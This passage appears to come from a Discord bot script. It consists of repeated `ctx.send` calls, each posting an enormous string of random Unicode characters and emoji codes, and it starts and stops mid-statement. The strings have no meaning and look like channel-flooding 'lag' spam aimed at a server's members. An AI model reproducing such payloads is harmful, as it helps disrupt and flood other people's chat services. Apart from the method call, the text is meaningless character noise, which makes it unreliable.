ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻
ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏